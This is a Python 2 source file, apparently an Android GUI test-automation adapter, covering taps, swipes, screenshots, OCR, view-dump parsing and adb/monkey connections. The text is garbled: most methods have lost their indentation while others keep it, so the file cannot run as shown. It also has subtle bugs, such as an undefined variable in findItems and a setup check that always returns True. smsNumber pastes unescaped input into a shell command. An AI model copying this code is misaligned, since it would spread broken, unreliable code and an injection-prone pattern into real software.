def pressVolumeUp(self, **pressKeyKwArgs):
"""
Press the volume up button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_UP", **pressKeyKwArgs)
def pressVolumeDown(self, **pressKeyKwArgs):
"""
Press the volume down button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_DOWN", **pressKeyKwArgs)
    def reboot(self, reconnect=True, firstBoot=False):
        """
        Reboot the device.

        Parameters

          reconnect (boolean, optional)
                  If True, do not return until the device has been
                  connected after boot. Otherwise return once reboot
                  command has been sent. The default is True.

          firstBoot (boolean, optional)
                  If True, the device boots like it would have been
                  flashed. Requires that "adb root" works. The default
                  is False.

        Returns True on success, otherwise False.
        """
        # 120 is the maximum number of seconds to wait for the device
        # to come back after the reboot.
        return self._conn.reboot(reconnect, firstBoot, 120)
    def reconnect(self):
        """
        Close connections to the device and reconnect.

        Returns True on success, otherwise False (failure is logged).
        """
        del self._conn
        try:
            self._conn = _AndroidDeviceConnection(self.serialNumber)
            return True
        except Exception, e:
            _adapterLog("reconnect failed: %s" % (e,))
            return False
def refreshScreenshot(self, forcedScreenshot=None):
"""
Takes new screenshot from the device and updates latest
screenshot object.
Parameters:
forcedScreenshot (Screenshot or string, optional):
use given screenshot or image file, do not take new
screenshot.
Returns created Screenshot object.
"""
if forcedScreenshot != None:
if type(forcedScreenshot) == str:
self._lastScreenshot = Screenshot(
screenshotFile=forcedScreenshot,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
else:
self._lastScreenshot = forcedScreenshot
else:
screenshotFile = self._conn.screenshot(screenshotDir=self.screenshotDir)
self._lastScreenshot = Screenshot(
screenshotFile=screenshotFile,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
return self._lastScreenshot
    def refreshView(self, forcedView=None):
        """
        (Re)reads view items on display and updates the latest View
        object.

        Parameters:

          forcedView (View or filename, optional):
                use given View object or view file instead of reading
                items from the device.

        Returns created View object, or None if view data could not
        be read from the device.
        """
        def formatErrors(errors):
            return "refreshView parse errors:\n %s" % (
                "\n ".join(["line %s: %s error: %s" % e for e in errors]),)
        if forcedView != None:
            if isinstance(forcedView, View):
                self._lastView = forcedView
            elif type(forcedView) == str:
                # forcedView is a filename of a saved window dump.
                self._lastView = View(self.screenshotDir, self.serialNumber, file(forcedView).read())
                _adapterLog(formatErrors(self._lastView.errors()))
            else:
                raise ValueError("forcedView must be a View object or a filename")
            return self._lastView
        # Window dumps are occasionally garbled: retry parsing up to
        # _PARSE_VIEW_RETRY_LIMIT times before accepting errors.
        retryCount = 0
        while True:
            dump = self._conn.recvViewData()
            if dump == None: # dump unreadable
                return None
            view = View(self.screenshotDir, self.serialNumber, dump)
            if len(view.errors()) > 0 and retryCount < self._PARSE_VIEW_RETRY_LIMIT:
                _adapterLog(formatErrors(view.errors()))
                retryCount += 1
                time.sleep(0.2) # sleep before retry
            else:
                # successfully parsed or parsed with errors but no more retries
                self._lastView = view
                return view
def screenshot(self):
"""
Returns the latest Screenshot object.
Use refreshScreenshot() to get a new screenshot.
"""
return self._lastScreenshot
def screenSize(self):
"""
Returns screen size in pixels in tuple (width, height).
"""
if self._screenSize == None:
self._screenSize = self._conn.recvScreenSize()
return self._screenSize
def shell(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns output of "adb shell" command.
If you wish to receive exitstatus or standard output and error
separated from shellCommand, refer to shellSOE().
"""
return self._conn._runAdb(["shell", shellCommand])[1]
def shellSOE(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns tuple (exitStatus, standardOutput, standardError).
Requires tar and uuencode to be available on the device.
"""
return self._conn.shellSOE(shellCommand)
    def smsNumber(self, number, message):
        """
        Send message using SMS to given number.

        Parameters:

          number (string)
                  phone number to which the SMS will be sent

          message (string)
                  the message to be sent.

        Returns True on success, otherwise False.
        """
        smsCommand = ('am start -a android.intent.action.SENDTO ' +
                      '-d sms:%s --es sms_body "%s"' +
                      ' --ez exit_on_sent true') % (number, message)
        status, out, err = self.shellSOE(smsCommand)
        if status != 0:
            _logFailedCommand("sms", smsCommand, status, out, err)
            return False
        _adapterLog("SMS command returned %s" % (out + err,))
        # The intent opens the messaging UI; navigate to the Send
        # button and press it.
        time.sleep(2)
        self.pressKey("KEYCODE_DPAD_RIGHT")
        time.sleep(1)
        self.pressKey("KEYCODE_ENTER")
        return True
def supportsView(self):
"""
Check if connected device supports reading view data.
View data is needed by refreshView(), view(), verifyText() and
waitText(). It is produced by Android window dump.
Returns True if view data can be read, otherwise False.
"""
try:
self._conn.recvViewData()
return True
except AndroidConnectionError:
return False
    def swipe(self, (x, y), direction, **dragKwArgs):
        """
        swipe starting from coordinates (x, y) to direction ("n", "s",
        "e" or "w"). Swipe ends to the edge of the screen.

        Coordinates and keyword arguments are the same as for the drag
        function.

        Returns True on success, False if sending input failed.

        Raises Exception on an unrecognized direction.
        """
        d = direction.lower()
        # The end point is on the screen edge in the given compass
        # direction, keeping the other coordinate fixed.
        if d in ["n", "north"]: x2, y2 = self.intCoords((x, 0.0))
        elif d in ["s", "south"]: x2, y2 = self.intCoords((x, 1.0))
        elif d in ["e", "east"]: x2, y2 = self.intCoords((1.0, y))
        elif d in ["w", "west"]: x2, y2 = self.intCoords((0.0, y))
        else:
            msg = 'Illegal direction "%s"' % (direction,)
            _adapterLog(msg)
            raise Exception(msg)
        return self.drag((x, y), (x2, y2), **dragKwArgs)
def swipeBitmap(self, bitmap, direction, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **dragKwArgs):
"""
swipe starting from bitmap to direction ("n", "s", "e", or
"w"). Swipe ends to the edge of the screen.
Parameters:
colorMatch, area
refer to verifyBitmap documentation.
delayBeforeMoves, delayBetweenMoves, delayAfterMoves,
movePoints
refer to drag documentation.
Returns True on success, False if sending input failed.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("swipeBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.swipeItem(items[0], direction, **dragKwArgs)
def swipeItem(self, viewItem, direction, **dragKwArgs):
"""
swipe starting from viewItem to direction ("n", "s", "e" or
"w"). Swipe ends to the edge of the screen.
Keyword arguments are the same as for the drag function.
Returns True on success, False if sending input failed.
"""
return self.swipe(viewItem.coords(), direction, **dragKwArgs)
def systemProperty(self, propertyName):
"""
Returns Android Monkey Device properties, such as
"clock.uptime", refer to Android Monkey documentation.
"""
return self._conn.recvVariable(propertyName)
def tap(self, (x, y), long=False, hold=0.0):
"""
Tap screen on coordinates (x, y).
Parameters:
coordinates (floats in range [0.0, 1.0] or integers):
floating point coordinates in range [0.0, 1.0] are
scaled to full screen width and height, others are
handled as absolute coordinate values.
long (boolean, optional):
if True, touch the screen for a long time.
hold (float, optional):
time in seconds to touch the screen.
Returns True if successful, otherwise False.
"""
x, y = self.intCoords((x, y))
if long and hold == None:
hold = self._longTapHoldTime
if hold > 0.0:
try:
assert self._conn.sendTouchDown(x, y)
time.sleep(hold)
assert self._conn.sendTouchUp(x, y)
except:
return False
return True
else:
return self._conn.sendTap(x, y)
def tapBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **tapKwArgs):
"""
Find a bitmap from the latest screenshot, and tap it.
Parameters:
bitmap (string):
filename of the bitmap to be tapped.
colorMatch, area (optional):
refer to verifyBitmap documentation.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("tapBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.tapItem(items[0], **tapKwArgs)
def tapId(self, viewItemId, **tapKwArgs):
"""
Find an item with given id from the latest view, and tap it.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsById(viewItemId, count=1)
if len(items) > 0:
return self.tapItem(items[0], **tapKwArgs)
else:
_adapterLog("tapItemById(%s): no items found" % (viewItemId,))
return False
def tapItem(self, viewItem, **tapKwArgs):
"""
Tap the center point of viewItem.
"""
return self.tap(viewItem.coords(), **tapKwArgs)
def tapOcrText(self, word, match=1.0, preprocess=None, **tapKwArgs):
"""
Find the given word from the latest screenshot using OCR, and
tap it.
Parameters:
word (string):
the word to be tapped.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsByText(text, partial=partial, count=1)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topApp(self):
"""
Returns the name of the top application.
"""
return self._conn.recvTopAppWindow()[0]
def topWindow(self):
"""
Returns the name of the top window.
"""
return self._conn.recvTopAppWindow()[1]
    def type(self, text):
        # Type the given text on the device via the connection.
        # NOTE(review): returns whatever sendType returns — presumably
        # a success boolean like the other send* methods; confirm.
        return self._conn.sendType(text)
def verifyOcrText(self, word, match=1.0, preprocess=None):
"""
Verify using OCR that the last screenshot contains the given word.
Parameters:
word (string):
the word to be searched for.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
return self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess) != []
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1) != []
def verifyBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
"""
Verify that bitmap is present in the last screenshot.
Parameters:
bitmap (string):
filename of the bitmap file to be searched for.
colorMatch (float, optional):
required color matching accuracy. The default is 1.0
(exact match). For instance, 0.75 requires that
every pixel's every RGB component value on the
bitmap is at least 75 % match with the value of
corresponding pixel's RGB component in the
screenshot.
area ((left, top, right, bottom), optional):
search bitmap from the given area only. Left, top
right and bottom are either absolute coordinates
(integers) or floats in range [0.0, 1.0]. In the
latter case they are scaled to screenshot
dimensions. The default is (0.0, 0.0, 1.0, 1.0),
that is, search everywhere in the screenshot.
"""
assert self._lastScreenshot != None, "Screenshot required."
if self._lastScreenshot == None:
return False
return self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area) != []
def view(self):
"""
Returns the last view (the most recently refreshed view).
"""
return self._lastView
def wait(self, refreshFunc, waitFunc, waitFuncArgs, waitFuncKwargs={}, waitTime = 5.0, pollDelay = 1.0):
"""
Wait until waitFunc returns True or waitTime has expired.
Parameters:
refreshFunc (function):
this function is called before re-evaluating
waitFunc. For instance, refreshView or
refreshScreenshot.
waitFunc, waitFuncArgs, waitFuncKwargs (function, tuple,
dictionary):
wait for waitFunc(waitFuncArgs, waitFuncKwargs) to
return True
waitTime (float, optional):
max. time in seconds to wait for.
pollDelay (float, optional):
time in seconds to sleep between refreshs.
Returns True if waitFunc returns True - either immediately or
before waitTime has expired - otherwise False.
"""
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
startTime = time.time()
endTime = startTime + waitTime
now = startTime
while now < endTime:
time.sleep(min(pollDelay, (endTime - now)))
now = time.time()
refreshFunc()
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
return False
def waitBitmap(self, bitmap, colorMatch=None, area=None, **waitKwArgs):
"""
Wait until bitmap appears on screen.
Parameters:
bitmap (string):
filename of the bitmap to be waited for.
colorMatch, area (optional):
refer to verifyBitmap documentation.
waitTime, pollDelay (float, optional):
refer to wait documentation.
Returns True if bitmap appeared within given time limit,
otherwise False.
Updates the last screenshot.
"""
verifyBitmapKwArgs = {}
if colorMatch != None: verifyBitmapKwArgs['colorMatch'] = colorMatch
if area != None: verifyBitmapKwArgs['area'] = area
return self.wait(self.refreshScreenshot,
self.verifyBitmap, (bitmap,), verifyBitmapKwArgs,
**waitKwArgs)
def waitText(self, text, partial=False, **waitKwArgs):
"""
Wait until text appears in any view item.
Parameters:
text (string):
text to be waited for.
partial (boolean, optional):
refer to verifyText. The default is False.
waitTime, pollDelay (float, optional):
refer to wait.
Returns True if text appeared within given time limit,
otherwise False.
Updates the last view.
"""
return self.wait(self.refreshView,
self.verifyText, (text,), {'partial': partial},
**waitKwArgs)
def _bitmapFilename(self, bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in self.bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(self._fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
def _loadDeviceAndTestINIs(self, homeDir, deviceName, iniFile):
if deviceName != None:
_deviceIniFilename = homeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
if iniFile:
self.loadConfig(iniFile, override=True, level="test")
class _DeviceConf:
"""
Miniparser for INI files like:
[section1]
key1 = value1
; commented = out
# commented = out
"""
def __init__(self, fileObj=None):
# _conf is a dictionary:
# (section, key) -> value
self._conf = {}
if fileObj:
self.addFile(fileObj)
def addFile(self, fileObj, override=True):
for line in fileObj:
line = line.strip()
if line.startswith('[') and line.endswith(']'):
section = line[1:-1].strip()
elif line.startswith(";") or line.startswith("#"):
continue
elif '=' in line:
key, value = line.split('=')
if override or (section, key.strip()) not in self._conf:
self._conf[(section, key.strip())] = value.strip()
def sections(self):
return list(set([k[0] for k in self._conf.keys()]))
def keys(self, section):
return [k[1] for k in self._conf.keys() if k[0] == section]
def dump(self):
lines = []
for section in sorted(self.sections()):
lines.append("[%s]" % (section,))
for key in sorted(self.keys(section)):
lines.append("%-16s = %s" % (key, self._conf[(section, key)]))
lines.append("")
return "\n".join(lines)
def set(self, section, key, value):
self._conf[(section, key)] = value
def value(self, section, key, default=""):
"""
Returns the value associated with the key in the section.
The default is returned if the key is not found.
dump() will dump also sections and keys with
default values that have been returned.
"""
if not (section, key) in self._conf:
self._conf[(section, key)] = default
return self._conf[(section, key)]
class Screenshot(object):
"""
Screenshot class takes and holds a screenshot (bitmap) of device
display, or a forced bitmap file if device connection is not given.
"""
    def __init__(self, screenshotFile=None, pathSolver=None, screenSize=None):
        # screenshotFile: path of the captured image file
        # pathSolver: function resolving bitmap names to full paths
        # screenSize: (width, height) of the device screen in pixels
        self._filename = screenshotFile
        self._pathSolver = pathSolver
        self._screenSize = screenSize
        # The bitmap held inside screenshot object is never updated.
        # If new screenshot is taken, this screenshot object disappears.
        # => cache all search hits
        self._cache = {}
        self._ocrWords = None  # filled lazily by _assumeOcrWords()
        self._ocrPreprocess = _OCRPREPROCESS
def dumpOcrWords(self, preprocess=None):
self._assumeOcrWords(preprocess=preprocess)
w = []
for ppfilter in self._ocrWords:
for word in self._ocrWords[ppfilter]:
for appearance, (wid, middle, bbox) in enumerate(self._ocrWords[ppfilter][word]):
(x1, y1, x2, y2) = bbox
w.append((word, x1, y1))
return sorted(set(w), key=lambda i:(i[2]/8, i[1]))
def filename(self):
return self._filename
def findItemsByBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
bitmap = self._pathSolver(bitmap)
if (bitmap, colorMatch) in self._cache:
return self._cache[(bitmap, colorMatch)]
eyenfinger.iRead(source=self._filename, ocr=False)
try:
score, bbox = eyenfinger.iVerifyIcon(bitmap, colorMatch=colorMatch, opacityLimit=.95, area=area)
foundItem = self._item("bitmap", bbox, bitmap=bitmap)
self._cache[(bitmap, colorMatch)] = [foundItem]
except eyenfinger.BadMatch:
_adapterLog('findItemsByBitmap no match for "%s" in "%s"' % (bitmap, self._filename))
self._cache[(bitmap, colorMatch)] = []
return self._cache[(bitmap, colorMatch)]
def findItemsByOcr(self, text, preprocess=None, match=1.0):
self._assumeOcrWords(preprocess=preprocess)
for ppfilter in self._ocrWords.keys():
try:
eyenfinger._g_words = self._ocrWords[ppfilter]
(score, word), bbox = eyenfinger.iVerifyWord(text, match=match)
break
except eyenfinger.BadMatch:
continue
else:
return []
return [self._item("OCR word", bbox, ocrFind=text, ocrFound=word)]
def save(self, fileOrDirName):
shutil.copy(self._filename, fileOrDirName)
def _assumeOcrWords(self, preprocess=None):
if self._ocrWords == None:
if preprocess == None:
preprocess = self._ocrPreprocess
if not type(preprocess) in (list, tuple):
preprocess = [preprocess]
self._ocrWords = {}
for ppfilter in preprocess:
pp = ppfilter % { "zoom": "-resize %sx" % (self._screenSize[0] * 2) }
eyenfinger.iRead(source=self._filename, ocr=True, preprocess=pp)
self._ocrWords[ppfilter] = eyenfinger._g_words
def _item(self, className, (x1, y1, x2, y2), bitmap=None, ocrFind=None, ocrFound=None):
return ViewItem(
className, None, 0,
{"layout:mLeft": x1,
"layout:mTop": y1,
"layout:getHeight()": y2-y1,
"layout:getWidth()": x2-x1,
"screenshot": self._filename,
"bitmap": bitmap,
"ocrFind": ocrFind,
"ocrFound": ocrFound,
},
None, "")
def __str__(self):
return 'Screenshot(filename="%s")' % (self._filename,)
class ViewItem(object):
    """
    ViewItem holds the information of a single GUI element.
    """
    def __init__(self, className, code, indent, properties, parent, rawProps):
        self._className = className
        self._code = code
        self._indent = indent
        self._p = properties
        self._parent = parent
        self._children = []
        self._bbox = []
        # BUGFIX: rawProps was discarded (assigned ""), which made
        # View.findItemsByRawProps never match anything.
        self._rawProps = rawProps
        # Ensure scroll offsets exist so bbox() can always subtract them.
        if not "scrolling:mScrollX" in self._p:
            self._p["scrolling:mScrollX"] = 0
            self._p["scrolling:mScrollY"] = 0
    def addChild(self,child): self._children.append(child)
    def bbox(self):
        """Return (left, top, right, bottom) in absolute screen
        coordinates, accumulating ancestor offsets minus their scroll
        positions. The result is computed once and cached."""
        if self._bbox == []:
            left = int(self._p["layout:mLeft"])
            top = int(self._p["layout:mTop"])
            parent = self._parent
            while parent:
                pp = parent._p
                left += int(pp["layout:mLeft"]) - int(pp["scrolling:mScrollX"])
                top += int(pp["layout:mTop"]) - int(pp["scrolling:mScrollY"])
                parent = parent._parent
            height = int(self._p["layout:getHeight()"])
            width = int(self._p["layout:getWidth()"])
            self._bbox = (left, top, left + width, top + height)
        return self._bbox
    def children(self): return self._children
    def className(self): return self._className
    def code(self): return self._code
    def coords(self):
        """Return the center point of the item's bounding box."""
        left, top, right, bottom = self.bbox()
        return (left + (right-left)/2, top + (bottom-top)/2)
    def indent(self): return self._indent
    def id(self): return self.property("mID")
    def parent(self): return self._parent
    def properties(self): return self._p
    def property(self, propertyName):
        # Returns None for unknown property names.
        return self._p.get(propertyName, None)
    def text(self): return self.property("text:mText")
    def visible(self):
        return self._p.get("getVisibility()", "") == "VISIBLE"
    def dump(self):
        """Return a verbose multi-line description of this item."""
        p = self._p
        return ("ViewItem(\n\tchildren = %d\n\tclassName = '%s'\n\tcode = '%s'\n\t" +
                "indent = %d\n\tproperties = {\n\t\t%s\n\t})") % (
            len(self._children), self._className, self._code, self._indent,
            '\n\t\t'.join(['"%s": %s' % (key, p[key]) for key in sorted(p.keys())]))
    def __str__(self):
        return ("ViewItem(className='%s', id=%s, bbox=%s)" % (
            self._className, self.id(), self.bbox()))
class View(object):
"""
View provides interface to screen dumps from Android. It parses
the dump to a hierarchy of ViewItems. find* methods enable searching
for ViewItems based on their properties.
"""
def __init__(self, screenshotDir, serialNumber, dump):
self.screenshotDir = screenshotDir
self.serialNumber = serialNumber
self._viewItems = []
self._errors = []
self._lineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>[0-9A-Fa-f]{8} )(?P<properties>.*)")
self._olderAndroidLineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>\w)(?P<properties>.*)")
self._propRegEx = re.compile("(?P<prop>(?P<name>[^=]+)=(?P<len>\d+),)(?P<data>[^\s]* ?)")
self._dump = dump
self._rawDumpFilename = self.screenshotDir + os.sep + _filenameTimestamp() + "-" + self.serialNumber + ".view"
file(self._rawDumpFilename, "w").write(self._dump)
try: self._parseDump(dump)
except Exception, e:
self._errors.append((-1, "", "Parser error"))
def viewItems(self): return self._viewItems
def errors(self): return self._errors
def dumpRaw(self): return self._dump
def dumpItems(self, itemList = None):
if itemList == None: itemList = self._viewItems
l = []
for i in itemList:
l.append(self._dumpItem(i))
return '\n'.join(l)
def dumpTree(self, rootItem = None):
l = []
if rootItem != None:
l.extend(self._dumpSubTree(rootItem, 0))
else:
for i in self._viewItems:
if i._indent == 0:
l.extend(self._dumpSubTree(i, 0))
return '\n'.join(l)
def _dumpSubTree(self, viewItem, indent):
l = []
i = viewItem
l.append(" "*indent + self._dumpItem(viewItem))
for i in viewItem.children():
l.extend(self._dumpSubTree(i, indent + 4))
return l
def _dumpItem(self, viewItem):
i = viewItem
if i.text() != None: t = '"%s"' % (i.text(),)
else: t = None
return "id=%s cls=%s text=%s bbox=%s" % (
i.id(), i.className(), t, i.bbox())
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
# find from searchRootItem and its children
if comparator(searchRootItem):
foundItems.append(i)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
else:
if searchItems != None:
# find from listed items only
searchDomain = searchItems
else:
# find from all items
searchDomain = self._viewItems
for i in searchDomain:
if comparator(i):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
"""
Searches the GUI hiearhy for a object with a given text
"""
if partial:
c = lambda item: (
item.properties().get("text:mText", "").find(text) != -1 )
else:
c = lambda item: (
item.properties().get("text:mText", None) == text )
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsById(self, id, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item.properties().get("mID", "") == id
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByClass(self, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
if partial: c = lambda item: item.className().find(className) != -1
else: c = lambda item: item.className() == className
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByIdAndClass(self, id, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
idOk = self.findItemsById(id, count=-1, searchRootItem=searchRootItem)
return self.findItemsByClass(className, partial=partial, count=count, searchItems=idOk)
def findItemsByRawProps(self, s, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item._rawProps.find(s) != -1
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def save(self, fileOrDirName):
shutil.copy(self._rawDumpFilename, fileOrDirName)
def _parseDump(self, dump):
"""
Process the raw dump data and create a tree of ViewItems
"""
# This code originates from tema-android-adapter-3.2,
# AndroidAdapter/guireader.py.
self._viewItems = []
cellLayout = ""
parent = None
previousItem = None
currentIndent = 0
visible = True
self.TOP_PAGED_VIEW = ""
for lineIndex, line in enumerate(dump.splitlines()):
if line == "DONE.":
break
# separate indent, class and properties for each GUI object
# TODO: branch here according to self._androidVersion
matcher = self._lineRegEx.match(line)
if not matcher:
# FIXME: this hack falls back to old format,
# should branch according to self._androidVersion!
matcher = self._olderAndroidLineRegEx.match(line)
if not matcher:
self._errors.append((lineIndex + 1, line, "Illegal line"))
continue # skip this line
className = matcher.group("class")
# Indent specifies the hierarchy level of the object
indent = len(matcher.group("indent"))
# If the indent is bigger that previous, this object is a
# child for the previous object
if indent > currentIndent:
parent = self._viewItems[-1]
elif indent < currentIndent:
for tmp in range(0, currentIndent - indent):
parent = parent.parent()
currentIndent = indent
propertiesData = matcher.group("properties")
properties = {}
index = 0
x = 0
y = 0
# Process the properties of each GUI object
while index < len(propertiesData):
# Separate name and value for each property [^=]*=
propMatch = self._propRegEx.match(propertiesData[index:-1])
if not propMatch or len(propMatch.group("data")) < int(propMatch.group("len")):
if not propMatch.group("data"):
self._errors.append((lineIndex, propertiesData[index:-1], "Illegal property"))
return None
startFrom = index + propertiesData[index:-1].find(propMatch.group("data"))
currFixedData = propertiesData[startFrom:(startFrom + int(propMatch.group("len")))]
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = currFixedData[0:length].lstrip()
else:
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = propMatch.group("data")[0:length].lstrip()
index += len(propMatch.group("prop")) + length + 1
self._viewItems.append(ViewItem(matcher.group("class"), matcher.group("id"), indent, properties, parent, matcher.group("properties")))
if parent:
parent.addChild(self._viewItems[-1])
return self._viewItems
def __str__(self):
return 'View(items=%s, dump="%s")' % (
len(self._viewItems), self._rawDumpFilename)
class _AndroidDeviceConnection:
"""
Connection to the Android Device being tested.
"""
_m_host = 'localhost'
_m_port = random.randint(20000, 29999)
_w_host = 'localhost'
_w_port = _m_port + 1
def __init__(self, serialNumber, stopOnError=True):
self._serialNumber = serialNumber
self._stopOnError = stopOnError
self._shellSupportsTar = False
try:
self._resetMonkey()
self._resetWindow()
# check supported features
outputLines = self._runAdb("shell tar")[1].splitlines()
if len(outputLines) == 1 and "bin" in outputLines[0]:
self._shellSupportsTar = False
else:
self._shellSupportsTar = True
finally:
# Next _AndroidDeviceConnection instance will use different ports
self._w_port = _AndroidDeviceConnection._w_port
self._m_port = _AndroidDeviceConnection._m_port
_AndroidDeviceConnection._w_port += 100
_AndroidDeviceConnection._m_port += 100
def __del__(self):
try: self._monkeySocket.close()
except: pass
def _cat(self, remoteFilename):
fd, filename = tempfile.mkstemp("fmbtandroid-cat-")
os.close(fd)
self._runAdb("pull '%s' %s" % (remoteFilename, filename), 0)
contents = file(filename).read()
os.remove(filename)
return contents
def _runAdb(self, command, expectedExitStatus=0):
if not self._stopOnError:
expect = None
else:
expect = expectedExitStatus
if type(command) == list:
command = ["adb", "-s", self._serialNumber] + command
else:
command = ("adb -s '%s' " % (self._serialNumber,)) + command
return _run(command, expectedExitStatus = expect)
def _runSetupCmd(self, cmd, expectedExitStatus = 0):
_adapterLog('setting up connections: "%s"' % (cmd,))
exitStatus, _, _ = self._runAdb(cmd, expectedExitStatus)
if exitStatus == 0: return True
else: return True
def _resetWindow(self):
setupCommands = ["shell service call window 1 i32 4939",
"forward tcp:%s tcp:4939" % (self._w_port,)]
for c in setupCommands:
self._runSetupCmd(c)
def _resetMonkey(self, timeout=3, pollDelay=.25):
self._runSetupCmd("shell monkey --port 1080", None)
time.sleep(pollDelay)
endTime = time.time() + timeout
while time.time() < endTime:
self._runSetupCmd("forward tcp:%s tcp:1080" % (self._m_port,), 0)
try:
self._monkeySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._monkeySocket.connect((self._m_host, self._m_port))
self._monkeySocket.setblocking(0)
self._monkeySocket.settimeout(1.0)
self._platformVersion = self._monkeyCommand("getvar build.version.release", retry=0)[1]
if len(self._platformVersion) > 0:
self._monkeySocket.settimeout(5.0)
return True
except Exception, e:
pass
time.sleep(pollDelay)
if self._stopOnError:
msg = 'Android monkey error: cannot connect to "adb shell monkey --port 1080" to device %s' % (self._serialNumber)
_adapterLog(msg)
raise AndroidConnectionError(msg)
else:
return False
def _monkeyCommand(self, command, retry=3):
try:
self._monkeySocket.sendall(command + "\n")
data = self._monkeySocket.recv(4096).strip()
if len(data) == 0 and retry > 0:
return self._monkeyCommand(command, retry-1)
if data == "OK":
return True, None
elif data.startswith("OK:"):
return True, data.split("OK:")[1]
_adapterLog("monkeyCommand failing... command: '%s' response: '%s'" % (command, data))
return False, None
except socket.error:
try: self.sock.close()
except: pass
if retry > 0:
self._resetMonkey()
return self._monkeyCommand(command, retry=retry-1)
else:
raise AndroidConnectionError('Android monkey socket connection lost while sending command "%s"' % (command,))
def reboot(self, reconnect, firstBootAfterFlashing, timeout):
if firstBootAfterFlashing:
self._runAdb("root")
time.sleep(2)
self._runAdb("shell rm /data/data/com.android.launcher/shared_prefs/com.android.launcher2.prefs.xml")
self._runAdb("reboot")
_adapterLog("rebooting " + self._serialNumber)
if reconnect:
self._runAdb("wait-for-device")
endTime = time.time() + timeout
while time.time() < endTime:
try:
if self._resetMonkey(timeout=1, pollDelay=1):
break
except AndroidConnectionError:
pass
time.sleep(1)
else:
_adapterLog("reboot: reconnecting to " + self._serialNumber + " failed")
return False
self._resetWindow()
return True
def recvVariable(self, variableName):
